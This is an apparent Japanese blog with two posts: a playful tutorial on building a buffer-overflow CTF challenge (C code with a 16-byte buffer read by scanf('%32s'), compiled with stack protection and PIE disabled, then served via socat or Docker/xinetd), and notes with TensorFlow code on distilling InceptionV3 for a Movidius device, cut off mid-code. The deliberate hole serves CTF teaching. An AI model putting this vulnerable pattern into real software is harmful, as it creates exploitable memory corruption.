2018-10-08

初めてのPWN作り

10月27日はSECCON CTFオンライン予選！
手作りのPWN問題を職場の同僚や友達に送って，日ごろの感謝の気持ちを伝えてみませんか？

材料

★Docker 1つ
xinetd １つ
★git 適量
★gcc １つ
★Python2 １つ
★pwntools １つ
★vim ３つ
★お好みのテキストエディタ少々
お好みのLinuxディストリビューション(ArchLinuxを使用) １つ

下準備

Linuxにアップデートを入れてパッケージマネージャで馴染ませせてから，★を入れて混ぜ合わせる．:
ディストリビューションを確認して，その都度正しいパッケージマネージャでしっかり入れる．

# Arch
sudo pacman -Syu && sudo pacman -S docker git gcc-multilib python2 vim python2-pip && sudo pip2 install pwntools

# Ubuntu
sudo apt update && sudo apt upgrade && sudo apt install docker-ce git gcc python2 vim python2-pip && sudo pip2 install pwntools

問題作り

1. 生地を用意する

Buffer Over FlowやFormat String Attackなどどんな生地にするかを決める．

2.方法を考える

シェルコードやROPなどどんな方法でやるかを考えて適切なセキュリティ機構を選択する．

CANARY
ASLR
PIE
RELRO
x86 or amd64

3.作る

作る．

【ここでおいしく作るためのワンポイントアドバイス！】
1. ユーザーに何かを入力してもらう前にfflush(stdout);を呼び出そう！バッファされているputs()やprintf()の出力が全部出力されて，解いてくれる人からの好感度もアップ！
2. 攻撃対象の関数はmain()以外の関数にしよう！インストラクションポインタより前にスタックポインタがエラーを吐いてしまうから，main()のretではeipは振り向いてくれないぞ！

#include <stdio.h>
void print_flag(void) {
    // 略
}
int in_name(void) {
    char name[16];
    printf("Type Your Name : ");
    fflush(stdout);
    scanf("%32s", name);
    return 0;
}
int main(void) {
    in_name();
    return 0;
}

4.コンパイル

コンパイルをする．
【注意！！】普段のプログラミングでは何気なく使っているこのコンパイラ，PWNを作るときには注意深く気持ちを込めてオプションを決定しよう！

mkdir bin
gcc pwn.c -o bin/pwn -m32 -O0 -fno-stack-protector -no-pie -fno-pie

5.完成

問題は完成！
実際に攻撃できるかどうかpwntoolsを使って味見をしてみよう！

動作環境作り

ここまでで問題は完成したけど，ラッピングをして実際に動作するようにしてあげよう！
なんかめんどくさくなってきたけど頑張って！

【なんで環境作るん？】
pwnでルート取らせる問題で実際のルート取られたら大変やろ？
だからDockerでルート取られてもいい環境作るんやで（まる）別に自分で試すだけなら

socat TCP-LISTEN:8080,reuseaddr,fork EXEC:./pwn

でおｋ

1.サービス起動

Archだったらこれやる．

sudo systemctl start docker.service

2.設定ファイルの用意

設定ファイル落としてくる

git clone https://github.com/Eadom/ctf_xinetd

ctf.xinetdのserver_args = --userspec=1000:1000 /home/ctf ./helloworld部分をhelloworldから自分の実行ファイル名に書き換える

3.ビルド

ビルドする．

sudo docker build -t "pwn"

4.実行

sudo docker run --rm -d -p "9999:9999" -h "pwn" --name="pwn" pwn

5.接続確認

わーいできたー！

接続確認．

nc localhost 9999

さっき作ったpwntoolsを今度はネットワーク越しに実行

Oh, YEAH !

2018-09-22

InceptionV3を蒸留してMovidiusで動かす

公開できるレベルではないくらいの雑さ
もっときれいにしたらgithubにアップする予定

テキトーなCNNに蒸留してみる

テキトーなCNN

入力 : 299 x 299 x 3
出力 : caltech101

conv2d(299,299,3)
conv2d(,,32)
conv2d(, , 64)
conv2d(, , 128)
dense(625)
dropout
dense(101)

結果

親

----------------------------------------------
EPOCH 3/3 

100%|██████████| 72/72 [00:29<00:00,  2.40it/s]
100%|██████████| 54/54 [00:06<00:00,  7.94it/s]

    loss: 0.8792 val accuracy: 0.8924

子

----------------------------------------------
EPOCH 30/30 

100%|██████████| 72/72 [00:17<00:00,  4.09it/s]
100%|██████████| 54/54 [00:03<00:00, 16.21it/s]

    loss: 7.9115 val accuracy: 0.4034

蒸留なしで子

----------------------------------------------
EPOCH 30/30 

100%|██████████| 72/72 [00:10<00:00,  6.81it/s]
100%|██████████| 54/54 [00:03<00:00, 15.68it/s]

    loss: 16.6656 val accuracy: 0.4259

負けた

Movidiusで動かす

mvNCProfileで推論の時間だけ測定できた。
299 x 299 x 3の画像で、１枚当たり130.27msらしい

実測値：

Time : 58.298219442367554 (435 images)

1枚当たり134msとのこと
つまり、画像のロードには4msくらいしかかかってない

ちなみに、パラメータ数は83M

まとめ

InceptionV3をファインチューニングして、それを別のネットワークに蒸留したものをMovidiusで動かせるようになった。

InceptionV3をMobilenetV1 224x224 a=1に学習させる

tensorflow/modelsのnetsをインストール

python setup.py install

そしたらロードできるようになる

import nets.mobilenet_v1

で、

stu2_logits, stu2_end_points = nets.mobilenet_v1.mobilenet_v1()

をするときに、得られるstu2_end_pointsにはmobilenetの詳細が入ってる。
これの中身を見るといろいろ分かる。

['Conv2d_0', 'Conv2d_1_depthwise', 'Conv2d_1_pointwise', 'Conv2d_2_depthwise', 'Conv2d_2_pointwise', 'Conv2d_3_depthwise', 'Conv2d_3_pointwise', 'Conv2d_4_depthwise', 'Conv2d_4_pointwise', 'Conv2d_5_depthwise', 'Conv2d_5_pointwise', 'Conv2d_6_depthwise', 'Conv2d_6_pointwise', 'Conv2d_7_depthwise', 'Conv2d_7_pointwise', 'Conv2d_8_depthwise', 'Conv2d_8_pointwise', 'Conv2d_9_depthwise', 'Conv2d_9_pointwise', 'Conv2d_10_depthwise', 'Conv2d_10_pointwise', 'Conv2d_11_depthwise', 'Conv2d_11_pointwise', 'Conv2d_12_depthwise', 'Conv2d_12_pointwise', 'Conv2d_13_depthwise', 'Conv2d_13_pointwise', 'AvgPool_1a', 'Logits', 'Predictions']

モデルを作るときに、出力層の数は指定できるけど、学習済みチェックポイントと一致しないから、変わった部分の重みは読み込まないようにしなくちゃダメ

例えば、上のを見るとLogitsとPredictionsがあやしい

print("shape of logits: ", ep2['Logits'].shape)
print("shape of prediction: ", ep2['Predictions'].shape)

気になるやつらのシェイプを確認して、自分が指定した出力層の数になってたら、そのやつらには読み込ませない。

mbnet_pretrained_include = ["MobilenetV1"]
mbnet_pretrained_exclude = ["MobilenetV1/Predictions", "MobilenetV1/Logits"]
mbnet_pretrained_vars = tf.contrib.framework.get_variables_to_restore(
        include=mbnet_pretrained_include, exclude=mbnet_pretrained_exclude)
mbnet_pretrained_saver = tf.train.Saver(
    mbnet_pretrained_vars, name="mobilenet_pretrained_saver")

やってみる

親

----------------------------------------------
EPOCH 30/30 

100%|██████████| 72/72 [00:16<00:00,  4.35it/s]
100%|██████████| 54/54 [00:03<00:00, 13.75it/s]

    loss: 0.0003 val accuracy: 0.8582

子

----------------------------------------------
EPOCH 72/300 

100%|██████████| 72/72 [00:17<00:00,  4.01it/s]
100%|██████████| 54/54 [00:02<00:00, 23.67it/s]

    loss: 6.1732 val accuracy: 0.4126

Movidius用に変換してみる

mvNCCompileすると

FailedPreconditionError (see above for traceback): Attempting to use uninitialized value MobilenetV1/Conv2d_0/BatchNorm/moving_mean

とのこと、

変換するときのSaverが保存する変数がtrainableのみになってたので、tf.global_variables()にしたところ、

NotFoundError: Key MobilenetV1/Conv2d_0/BatchNorm/moving_mean not found in checkpoint

ということは、根本的に保存した時点でこの変数が抜けていたようだ。
なので、おおもとのファイルでもtf.global_variables()にして保存した。

[Error 5] Toolkit Error: Stage Details Not Supported: Top Not Found preprocess/rescaled_inputs

[Error 5] Toolkit Error: Stage Details Not Supported: Top Not Found mbnet_struct/truediv

別のエラーになった。
divに対応していないのだろうか？

前者は事前に255で割って入力することにした。
後者は使ってなかった。

消して再実行

tokunn@nanase 9:00:09 [~/Documents/distil_incep2mbnet0921] $ python3 movidius.py /home/tokunn/caltech101/butterfly 2>/dev/null
Image path : /home/tokunn/caltech101/butterfly/*.jpg or *.png
['image_0032.jpg', 'image_0073.jpg', 'image_0017.jpg', 'image_0089.jpg', 'image_0085.jpg', 'image_0078.jpg', 'image_0056.jpg', 'image_0069.jpg', 'image_0074.jpg', 'image_0025.jpg']
imgshape  (91, 224, 224)
Start predicting ...
butterfly Faces butterfly chandelier butterfly Faces chandelier butterfly butterfly butterfly butterfly revolver butterfly butterfly revolver butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly chandelier butterfly butterfly butterfly butterfly butterfly butterfly butterfly sunflower revolver butterfly chandelier butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly chandelier butterfly butterfly butterfly Faces butterfly Faces butterfly butterfly butterfly Faces butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly chandelier cellphone butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly 
Time : 3.817107915878296 (91 images)

すばらしい！

ソースコード

テキトーなCNN編

親子

#!/usr/bin/env python
# coding: utf-8

# In[1]:


import os,time,glob
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" 
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
import tensorflow as tf
import numpy as np
import tensorflow.contrib.slim as slim
import tensorflow.contrib.slim.nets
#from __future__ import print_function, division
import loadimg_caltech as loadimg
from tqdm import tqdm
import matplotlib.pyplot as plt

start = time.time()


# In[2]:


np_aryname = './models/data{0}.npy'
    
try: # LOAD
    X_train = np.load(np_aryname.format('X_train'))
    Y_train = np.load(np_aryname.format('Y_train'))
    X_test = np.load(np_aryname.format('X_test'))
    Y_test = np.load(np_aryname.format('Y_test'))
    number_of_classes = np.asscalar(np.load(np_aryname.format('number_of_classes')))
    
except FileNotFoundError:
    print("### Load from Images ###")
    X_train, Y_train, X_test, Y_test, number_of_classes = loadimg.loadimg(
        '/home/tokunn/caltech101')

    np.save(np_aryname.format('X_train'), X_train)
    np.save(np_aryname.format('Y_train'), Y_train)
    np.save(np_aryname.format('X_test'), X_test)
    np.save(np_aryname.format('Y_test'), Y_test)
    np.save(np_aryname.format('number_of_classes'), number_of_classes)


print("X_train", X_train.shape)
print("Y_train", Y_train.shape)
print("X_test", X_test.shape)
print("Y_test", Y_test.shape)
print("Number of Classes", number_of_classes)


# In[3]:


SNAPSHOT_FILE = "./models/snapshot.ckpt"
STU_SNAPSHOT_FILE = "./models/student_snapshot.ckpt"
PRETRAINED_SNAPSHOT_FILE = "./models/inception_v3.ckpt"

# somewhere to store the tensorboard files - to visualise the graph
TENSORBOARD_DIR = "logs"
#[os.remove(i) for i in glob.glob(os.path.join(TENSORBOARD_DIR, '*.nanase'))]

# IMAGE SETTINGS
IMG_WIDTH, IMG_HEIGHT = [299,299] # Dimensions required by inception V3
N_CHANNELS = 3                    # Number of channels required by inception V3
N_CLASSES = number_of_classes                    # Change N_CLASSES to suit your needs

temperature = 4


# In[4]:


def NetworkStudent(input,keep_prob_conv,keep_prob_hidden,scope='Student', reuse = False):
    with tf.variable_scope(scope, reuse = reuse) as sc:
        with slim.arg_scope([slim.conv2d],
                            kernel_size = [3,3],
                            stride = [1,1],
                            biases_initializer=tf.constant_initializer(0.0),
                            activation_fn=tf.nn.relu):
                                                      
            net = slim.conv2d(input, 32, scope='conv1')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool1')
            net = tf.nn.dropout(net, keep_prob_conv)

            net = slim.conv2d(net, 64,scope='conv2')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool2')
            net = tf.nn.dropout(net, keep_prob_conv)

            net = slim.conv2d(net, 128,scope='conv3')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool3')
            net = tf.nn.dropout(net, keep_prob_conv)
            
            net = slim.conv2d(net, 256,scope='conv4')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool4')
            net = tf.nn.dropout(net, keep_prob_conv)
    
            net = slim.flatten(net)
        with slim.arg_scope([slim.fully_connected],
                            biases_initializer=tf.constant_initializer(0.0),
                            activation_fn=tf.nn.relu) :
            
            net = slim.fully_connected(net,1000,scope='fc1') # 625
            net = tf.nn.dropout(net, keep_prob_hidden)
            net = slim.fully_connected(net,N_CLASSES,activation_fn=None,scope='fc2')
            
            #net = tf.nn.softmax(net/temperature)
            return net


# In[5]:


def loss(prediction,output):#,temperature = 1):
    cross_entropy = tf.reduce_mean(-tf.reduce_sum(
        tf.cast(output, tf.float32) * tf.log(tf.clip_by_value(prediction,1e-10,1.0)),
                                                  reduction_indices=[1]))      
    #correct_prediction = tf.equal(tf.argmax(prediction,1), tf.argmax(output,1))
    #accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
    return cross_entropy#,accuracy


# In[6]:


graph = tf.Graph()
with graph.as_default():
    # INPUTS
    with tf.name_scope("inputs") as scope:
        input_dims = (None, IMG_HEIGHT, IMG_WIDTH, N_CHANNELS)
        tf_X = tf.placeholder(tf.float32, shape=input_dims, name="X")
        tf_Y = tf.placeholder(tf.int32, shape=[None, N_CLASSES], name="Y")
        tf_alpha = tf.placeholder_with_default(0.001, shape=None, name="alpha")
        tf_is_training = tf.placeholder_with_default(False, shape=None,
                                                     name="is_training")
        stu_keep_prob_conv = tf.placeholder(tf.float32)
        stu_keep_prob_hidden = tf.placeholder(tf.float32)
        
    # PREPROCESSING STEPS
    with tf.name_scope("preprocess") as scope:
        scaled_inputs = tf.div(tf_X, 255., name="rescaled_inputs")

    # BODY
    arg_scope = tf.contrib.slim.nets.inception.inception_v3_arg_scope()
    with tf.contrib.framework.arg_scope(arg_scope):
        tf_logits, end_points = tf.contrib.slim.nets.inception.inception_v3(
            scaled_inputs,
            num_classes=N_CLASSES,
            is_training=tf_is_training,
            dropout_keep_prob=0.8)
        
    with tf.name_scope("softmax") as scope:
        tch_y = tf.nn.softmax(tf_logits/temperature, name="teacher_softmax")
        tch_y_actual = tf.nn.softmax(tf_logits, name="teacher_softmax_actual")
        
        
    # Student     
    stu_logits = NetworkStudent(tf_X, stu_keep_prob_conv,
                               stu_keep_prob_hidden, scope='student')
    with tf.name_scope("stu_struct"):
        # softmax
        stu_y = tf.nn.softmax(stu_logits/temperature, name="softmax")
        stu_y_actual = tf.nn.softmax(stu_logits, name="actual_softmax")
        
        
    # Seperate vars
    model_vars = tf.trainable_variables()
    var_teacher = [var for var in model_vars if 'InceptionV3' in var.name]
    var_student = [var for var in model_vars if 'student' in var.name]
   

    # PREDICTIONS
    tf_preds = tf.to_int32(tf.argmax(tf_logits, axis=-1), name="preds")

    # LOSS - Sums all losses (even Regularization losses)
    with tf.variable_scope('loss') as scope:
        #unrolled_labels = tf.reshape(tf_Y, (-1,))
        #tf.losses.softmax_cross_entropy(onehot_labels=unrolled_labels,
        
        tf.losses.softmax_cross_entropy(onehot_labels=tf_Y, logits=tf_logits)
        tf_loss = tf.losses.get_total_loss()
        
        #tf_loss = loss(tch_y_actual, tf_Y)

    # OPTIMIZATION - Also updates batchnorm operations automatically
    with tf.variable_scope('opt') as scope:
        #tf_optimizer = tf.train.AdamOptimizer(tf_alpha, name="optimizer")
        #update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) # for batchnorm
        #with tf.control_dependencies(update_ops):
        #    tf_train_op = tf_optimizer.minimize(tf_loss, name="train_op")
        
        grad_teacher = tf.gradients(tf_loss, var_teacher)
        tf_trainer = tf.train.AdamOptimizer(tf_alpha, name="optimizer")
        tf_train_step = tf_trainer.apply_gradients(zip(grad_teacher, var_teacher))
            
    # Evaluation
    with tf.variable_scope('eval') as scope:
        y = tf.nn.softmax(tf_logits, name='softmax')
        accuracy = tf.reduce_mean(
            tf.cast(tf.equal(tf.argmax(y, 1), tf.argmax(tf_Y, 1)), tf.float32)
        )
        
    # PRETRAINED SAVER SETTINGS
    # Lists of scopes of weights to include/exclude from pretrained snapshot
    pretrained_include = ["InceptionV3"]
    pretrained_exclude = ["InceptionV3/AuxLogits", "InceptionV3/Logits"]

    # PRETRAINED SAVER - For loading pretrained weights on the first run
    pretrained_vars = tf.contrib.framework.get_variables_to_restore(
        include=pretrained_include,
        exclude=pretrained_exclude)
    tf_pretrained_saver = tf.train.Saver(pretrained_vars, name="pretrained_saver")

    
         
    # Student
    with tf.name_scope("stu_train"):
        # loss
        tf.losses.softmax_cross_entropy(onehot_labels=tf_Y, logits=stu_logits)
        stu_loss1 = tf.losses.get_total_loss()
        #stu_loss1 = loss(stu_y_actual, tf_Y)
        stu_loss2 = tf.reduce_mean(- tf.reduce_sum(tch_y * tf.log(
            tf.clip_by_value(stu_y, 1e-10,1.0)), reduction_indices=1))
        stu_loss = 0.2 * stu_loss1 + stu_loss2
        #stu_loss = stu_loss1
       
        # optimization
        grad_student = tf.gradients(stu_loss,var_student)
        stu_trainer = tf.train.RMSPropOptimizer(learning_rate = 0.0002)
        #stu_trainer = tf.train.AdamOptimizer(tf_alpha, name="optimizer")
        #stu_trainer = tf.train.AdadeltaOptimizer()
        train_step_student = stu_trainer.apply_gradients(zip(grad_student, var_student))
        #stu_optimizer = tf.train.AdamOptimizer(tf_alpha, name="stu_optimizer")
        #stu_train_op = tf_optimizer.minimize(stu_loss, name="stu_train_op")
        # evaluation
        stu_accuracy = tf.reduce_mean(
            tf.cast(tf.equal(tf.argmax(stu_y_actual, 1), tf.argmax(tf_Y, 1)), tf.float32)
        )

        
    
    # MAIN SAVER - For saving/restoring your complete model
    tf_saver = tf.train.Saver(var_teacher, name="saver")
    
    # STUDENT SAVER
    
    stu_saver = tf.train.Saver(var_student, name="stu_saver")

    # TENSORBOARD - To visialize the architecture
    with tf.variable_scope('tensorboard') as scope:
        tf_summary_writer = tf.summary.FileWriter(TENSORBOARD_DIR, graph=graph)
        tf_dummy_summary = tf.summary.scalar(name="dummy", tensor=1)


# In[7]:


def initialize_vars(session):
    # INITIALIZE VARS
    LOAD_FROM_CHECKPOINT = False
    if LOAD_FROM_CHECKPOINT: #tf.train.checkpoint_exists(SNAPSHOT_FILE):
        print(" Loading from Main Checkpoint")
        session.run(tf.global_variables_initializer())
        tf_saver.restore(session, SNAPSHOT_FILE)
    else:
        print("Initializing from Pretrained Weights")
        session.run(tf.global_variables_initializer())
        tf_pretrained_saver.restore(session, PRETRAINED_SNAPSHOT_FILE)


# In[ ]:


with tf.Session(graph=graph) as sess:
    n_epochs = 5
    batch_size = 32 # small batch size so inception v3 can be run on laptops
    steps_per_epoch = len(X_train)//batch_size // 3 # FOR DEBUG
    steps_per_epoch_val = len(X_test)//batch_size

    initialize_vars(session=sess)

    print("##### Teacher Training Section #####")
    for epoch in range(n_epochs):
        print("----------------------------------------------", flush=True)
        print("EPOCH {}/{}".format(epoch+1, n_epochs), flush=True, end=' ')
           
        ## TRAINING
        for step in tqdm(range(steps_per_epoch)):
            # EXTRACT A BATCH OF TRAINING DATA
            X_batch = X_train[batch_size*step: batch_size*(step+1)]
            Y_batch = Y_train[batch_size*step: batch_size*(step+1)]

            # RUN ONE TRAINING STEP - feeding batch of data
            feed_dict = {tf_X: X_batch,
                         tf_Y: Y_batch,
                         tf_alpha:0.0001,
                         tf_is_training: True}
            #loss, _ = sess.run([tf_loss, tf_train_op], feed_dict=feed_dict)
            tf_train_step.run(feed_dict=feed_dict)
            
        ## EVALUATE
        val_accuracy = []
        for step in tqdm(range(steps_per_epoch_val)):
            # EXTRACT A BATCH OF TEST DATA
            X_batch = X_test[batch_size*step: batch_size*(step+1)]
            Y_batch = Y_test[batch_size*step: batch_size*(step+1)]
            
            # Evalution
            feed_dict = {tf_X: X_batch,
                         tf_Y: Y_batch,
                         tf_alpha:0.0001,
                         tf_is_training: False}            
            val_accuracy.append(accuracy.eval(feed_dict=feed_dict))
            
        # PRINT FEED BACK - once every `print_every` steps
        total_val_accuracy = np.average(np.asarray(val_accuracy))
        pre_logits, pre_loss = sess.run([tch_y, tf_loss], feed_dict = {
            tf_X: [X_test[5]],
            tf_Y: [Y_test[5]],
            tf_is_training: False
        })
        print("\tloss: {:0.4f} val accuracy: {:0.4f}".format(pre_loss, total_val_accuracy))
        plt.plot(pre_logits[0])
        plt.show()
       
        # SAVE SNAPSHOT - after each epoch
        tf_saver.save(sess, SNAPSHOT_FILE)
        

    print("### Student Training Section ###")
    n_epochs = 300
    steps_per_epoch = len(X_train)//batch_size // 3 # FOR DEBUG
    steps_per_epoch_val = len(X_test)//batch_size
    for epoch in range(n_epochs):
        print("----------------------------------------------", flush=True)
        print("EPOCH {}/{}".format(epoch+1, n_epochs), flush=True, end=' ')
           
        ## TRAINING
        for step in tqdm(range(steps_per_epoch)):
            # EXTRACT A BATCH OF TRAINING DATA
            X_batch = X_train[batch_size*step: batch_size*(step+1)]
            Y_batch = Y_train[batch_size*step: batch_size*(step+1)]

            # RUN ONE TRAINING STEP - feeding batch of data
            feed_dict = {tf_X: X_batch,
                         tf_Y: Y_batch,
                         #tf_alpha:0.001,
                         stu_keep_prob_conv: 0.8,
                         stu_keep_prob_hidden: 0.5}
            #loss, _ = sess.run(stu_loss, feed_dict=feed_dict)
            train_step_student.run(feed_dict=feed_dict)
            
        ## EVALUATE
        val_accuracy = []
        for step in tqdm(range(steps_per_epoch_val)):
            # EXTRACT A BATCH OF TEST DATA
            X_batch = X_test[batch_size*step: batch_size*(step+1)]
            Y_batch = Y_test[batch_size*step: batch_size*(step+1)]
            
            # Evalution
            feed_dict = {tf_X: X_batch,
                         tf_Y: Y_batch,
                         #tf_alpha:0.001,
                         stu_keep_prob_conv: 1.0,
                         stu_keep_prob_hidden: 1.0}      
            val_accuracy.append(stu_accuracy.eval(feed_dict=feed_dict))
            
        # PRINT FEED BACK - once every `print_every` steps
        total_val_accuracy = np.average(np.asarray(val_accuracy))
        pre_logits, pre_loss = sess.run([stu_logits, stu_loss], feed_dict = {
            tf_X: X_batch,
            tf_Y: Y_batch,
            #tf_alpha:0.001,
            stu_keep_prob_conv: 1.0,
            stu_keep_prob_hidden: 1.0
        })
        print("\tloss: {:0.4f} val accuracy: {:0.4f}".format(pre_loss, total_val_accuracy))
        plt.plot(pre_logits[0])
        plt.show()
        
        stu_saver.save(sess, STU_SNAPSHOT_FILE)
            
            
            
        
     


# In[ ]:


end = time.time()
print("Time : {0}".format(end-start))


# In[ ]:





# In[ ]:

変換用

#!/usr/bin/env python
# coding: utf-8

# In[1]:


import os,time,glob
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" 
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
import tensorflow as tf
import numpy as np
import tensorflow.contrib.slim as slim


# In[2]:


STU_SNAPSHOT_FILE = "./models/student_snapshot.ckpt"
STU_FLOZEN_FILE = "./models/student_flozen.ckpt"

# somewhere to store the tensorboard files - to visualise the graph
TENSORBOARD_DIR = "logs"
[os.remove(i) for i in glob.glob(os.path.join(TENSORBOARD_DIR, '*.nanase'))]

# IMAGE SETTINGS
IMG_WIDTH, IMG_HEIGHT = [299,299] # Dimensions required by inception V3
N_CHANNELS = 3                    # Number of channels required by inception V3
N_CLASSES = 101                    # Change N_CLASSES to suit your needs

temperature = 4


# In[3]:


def NetworkStudent(input,scope='Student', reuse = False):
    with tf.variable_scope(scope, reuse = reuse) as sc:
        with slim.arg_scope([slim.conv2d],
                            kernel_size = [3,3],
                            stride = [1,1],
                            biases_initializer=tf.constant_initializer(0.0),
                            activation_fn=tf.nn.relu):
                                                      
            net = slim.conv2d(input, 32, scope='conv1')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool1')

            net = slim.conv2d(net, 64,scope='conv2')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool2')

            net = slim.conv2d(net, 128,scope='conv3')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool3')
            
            net = slim.conv2d(net, 256,scope='conv4')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool4')
    
            net = slim.flatten(net)
        with slim.arg_scope([slim.fully_connected],
                            biases_initializer=tf.constant_initializer(0.0),
                            activation_fn=tf.nn.relu) :
            
            net = slim.fully_connected(net,1000,scope='fc1') # 625
            net = slim.fully_connected(net,N_CLASSES,activation_fn=None,scope='fc2')
            
            #net = tf.nn.softmax(net/temperature)
            return net


# In[4]:


graph = tf.Graph()
with graph.as_default():
    # INPUTS
    with tf.name_scope("inputs") as scope:
        input_dims = (None, IMG_HEIGHT, IMG_WIDTH, N_CHANNELS)
        tf_X = tf.placeholder(tf.float32, shape=input_dims, name="X")
        
    # PREPROCESSING STEPS
    with tf.name_scope("preprocess") as scope:
        scaled_inputs = tf.div(tf_X, 255., name="rescaled_inputs")

    # Student     
    stu_logits = NetworkStudent(tf_X, scope='student')
    with tf.name_scope("stu_struct"):
        # softmax
        stu_y = tf.nn.softmax(stu_logits/temperature, name="softmax")
        stu_y_actual = tf.nn.softmax(stu_logits, name="actual_softmax")
        
        
    # Seperate vars
    model_vars = tf.trainable_variables()
    var_student = [var for var in model_vars if 'student' in var.name]
    
    # parameter 
    total_parameters = 0
    for variable in tf.trainable_variables():
        # shape is an array of tf.Dimension
        shape = variable.get_shape()
        #print(shape)
        #print(len(shape))
        variable_parameters = 1
        for dim in shape:
            #print(dim)
            variable_parameters *= dim.value
        #print(variable_parameters)
        total_parameters += variable_parameters
    print("total params: ",total_parameters)
    
    # STUDENT SAVER
    
    stu_saver = tf.train.Saver(var_student, name="stu_saver")

    # TENSORBOARD - To visialize the architecture
    with tf.variable_scope('tensorboard') as scope:
        tf_summary_writer = tf.summary.FileWriter(TENSORBOARD_DIR, graph=graph)
        tf_dummy_summary = tf.summary.scalar(name="dummy", tensor=1)


# In[5]:


with tf.Session(graph=graph) as sess:
    sess.run(tf.global_variables_initializer())
    sess.run(tf.local_variables_initializer())

        
    stu_saver.restore(sess, STU_SNAPSHOT_FILE)
    stu_saver.save(sess, STU_FLOZEN_FILE)


# In[ ]:





# In[ ]:

Movidiusでの予測用

import mvnc.mvncapi as mvnc
import numpy as np
from PIL import Image
import cv2
import time, sys, os

import glob

IMAGE_DIR_NAME = '/home/tokunn/caltech101'
if (len(sys.argv) > 1):
    IMAGE_DIR_NAME = sys.argv[1]
#IMAGE_DIR_NAME = 'github_deep_mnist/ncappzoo/data/digit_images'

def predict(input):
    print("Start prediting ...")
    devices = mvnc.EnumerateDevices()
    device = mvnc.Device(devices[0])
    device.OpenDevice()

    # Load graph file data
    with open('./models/graph', 'rb') as f:
        graph_file_buffer = f.read()

    # Initialize a Graph object
    graph = device.AllocateGraph(graph_file_buffer)

    start = time.time()
    for i in range(len(input)):
        # Write the tensor to the input_fifo and queue an inference
        graph.LoadTensor(input[i], None)
        output, userobj = graph.GetResult()
        print(np.argmax(output), end=' ')
    stop = time.time()
    print('')
    print("Time : {0} ({1} images)".format(stop-start, len(input)))

    graph.DeallocateGraph()
    device.CloseDevice()

    return output

if __name__ == '__main__':
    print("Image path : {0}".format(os.path.join(IMAGE_DIR_NAME, '*.jpg or *.png')))
    jpg_list = glob.glob(os.path.join(IMAGE_DIR_NAME, '*.jpg'))
    jpg_list += glob.glob(os.path.join(IMAGE_DIR_NAME, '*.png'))
    if not len(jpg_list):
        print("No image file")
        sys.exit()
    jpg_list.reverse()
    print([i.split('/')[-1] for i in jpg_list][:10])
    img_list = []
    for n in jpg_list:
        image = cv2.imread(n)
        image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
        image = cv2.resize(image, (299, 299))
        img_list.append(image)
    img_list = np.asarray(img_list)# * (1.0/255.0)
    #img_list = np.reshape(img_list, [-1, 784])
    print("imgshape ", img_list.shape)
    predict(img_list.astype(np.float16))

InceptionV3をMobilenetV1へ編

親子

#!/usr/bin/env python
# coding: utf-8

# In[1]:


import os,time,glob,sys
#sys.path.append('/home/tokunn/sources/models/research/slim')
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" 
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
import tensorflow as tf
import numpy as np
import tensorflow.contrib.slim as slim
import tensorflow.contrib.slim.nets
import nets.mobilenet_v1
#from __future__ import print_function, division
import loadimg_caltech as loadimg
from tqdm import tqdm
import matplotlib.pyplot as plt

start = time.time()


# In[2]:


np_aryname = './models/data{0}.npy'
    
try: # LOAD
    X_train = np.load(np_aryname.format('X_train'))
    Y_train = np.load(np_aryname.format('Y_train'))
    X_test = np.load(np_aryname.format('X_test'))
    Y_test = np.load(np_aryname.format('Y_test'))
    number_of_classes = np.asscalar(np.load(np_aryname.format('number_of_classes')))
    
except FileNotFoundError:
    print("### Load from Images ###")
    X_train, Y_train, X_test, Y_test, number_of_classes = loadimg.loadimg(
        '/home/tokunn/caltech101')

    np.save(np_aryname.format('X_train'), X_train)
    np.save(np_aryname.format('Y_train'), Y_train)
    np.save(np_aryname.format('X_test'), X_test)
    np.save(np_aryname.format('Y_test'), Y_test)
    np.save(np_aryname.format('number_of_classes'), number_of_classes)


print("X_train", X_train.shape)
print("Y_train", Y_train.shape)
print("X_test", X_test.shape)
print("Y_test", Y_test.shape)
print("Number of Classes", number_of_classes)


# In[3]:


SNAPSHOT_FILE = "./models/snapshot.ckpt"
#STU_SNAPSHOT_FILE = "./models/student_snapshot.ckpt"
MBNET_SNAPSHOT_FILE = "./models/mbnet_student_snapshot.ckpt"
PRETRAINED_SNAPSHOT_FILE = "./models/inception_v3.ckpt"
PRETRAINED_MOBILENET_FILE = "./models/mobilenet/mobilenet_v1_1.0_224.ckpt"

# somewhere to store the tensorboard files - to visualise the graph
TENSORBOARD_DIR = "logs"
[os.remove(i) for i in glob.glob(os.path.join(TENSORBOARD_DIR, '*.nanase'))]

# IMAGE SETTINGS
IMG_WIDTH, IMG_HEIGHT = [224,224] # Dimensions required by inception V3
N_CHANNELS = 3                    # Number of channels required by inception V3
N_CLASSES = number_of_classes                    # Change N_CLASSES to suit your needs

temperature = 20


# In[4]:


def NetworkStudent2(input,scope='Student', tf_is_training=False, reuse = False):
    #with tf.variable_scope(scope, reuse = reuse) as sc:
    arg_scope = nets.mobilenet_v1.mobilenet_v1_arg_scope()
    with tf.contrib.framework.arg_scope(arg_scope):
        stu2_logits, stu2_end_points = nets.mobilenet_v1.mobilenet_v1(
            scaled_inputs,
